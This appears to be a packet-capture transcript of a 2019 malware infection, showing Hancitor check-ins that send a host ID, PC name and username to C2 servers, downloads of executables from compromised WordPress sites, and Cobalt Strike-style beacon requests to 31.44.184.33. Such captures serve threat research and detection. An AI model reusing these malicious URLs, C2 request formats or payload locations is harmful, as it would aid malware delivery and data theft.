Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f......
..e
....x.5.&E..............codeotso.com.....
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6.......

..e.5.x.6...............codeotso.com.................S...
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@....[
..eS......Po0W3...... ..T..............
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6......CS...
..e.P..rM..o0W4`...........
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@....e
..eS......Po0W4rM..P....T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E....j@....~
..eS......Po0W4rM..P.......POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6......FS...
..e.P..rM..o0X.P....n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6......ES...
..e.P..rM..o0X.P....x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6.......

..e.5...8..sJ...........fordifortti.ru.................Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@.....
..eMxs....PQd........ .................
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6.......

..e.5...;..LS...........material-nerud.ru.................\5.
2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0
E..,6......}Mxs.
..e.P..
DrUQd.....^......
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@.....
..eMxs....PQd..
DrVP...v...
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E....r@.....
..eMxs....PQd..
DrVP.......POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6.......Mxs.
..e.P..
DrVQd..P...u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@.....
..e\5....P.]2....... ..[..............
2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0
E..,6.....$.\5.
..e.P.....<.]2.....p......
2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0
E..(.t@...."
..e\5....P.]2....=P.......
2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@.....
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6.....$.\5`.
..e.P.....=.]4.P.......
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E...6.......Mxs.
..e.P..
DrVQd..P... C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@.....
..eMxs....PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6......|Mxs.
..e.P..
Ds.Qd..P...tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6.......\5`.
..e.P.....=.]4.P.......HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: "5d39c1ad-49400"
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@...l.
..e^| 5...P.o..6.i.P.......GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$....w.^| 5
..e.P..6.i..o..P...8...
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%....w.^| 5
..e.P...Q..L...`...........
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@...n(
..e^| 5...PL....Q..P.......
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@...l.
..e^| 5...PL....Q..P.......GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&....w.^| 5
..e.P...Q..L..CP....5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8'......S...
..e.P....p..Y.RP.......
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@....A
..eS......P.Y.R..p.P..+....
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(....rI^| 5
..e.P..6.i..o..P.......HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E.....@.....
..eMxs....P..7.`.?-P...b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86......Mxs.
..e.P..`.?-..8.P....V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E.....@....{
..e.,.!. .P[^b0.#.jP...+...GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8........,.!
..e.P. .#.j[^b.P...s...
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8......;S...
..e.P.!ZB..+..Q`...........
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@.....
..eS....!.P+..QZB..P....F..
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E.....@....c
..eS....!.P+..QZB..P...6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8......>S...
..e.P.!ZB..+...P.......
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@....3
..e.,.!.".P.b........ .................
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8......~Mxs.
..e.P..........P.......
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@....7
..eMxs....P........P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E...8........,.!
..e.P. .#.j[^b.P.......HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E....r@....5
..e.,.!.#.P....?t.5P....2..GET /visit.js HTTP/1.1
Accept: */*
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache
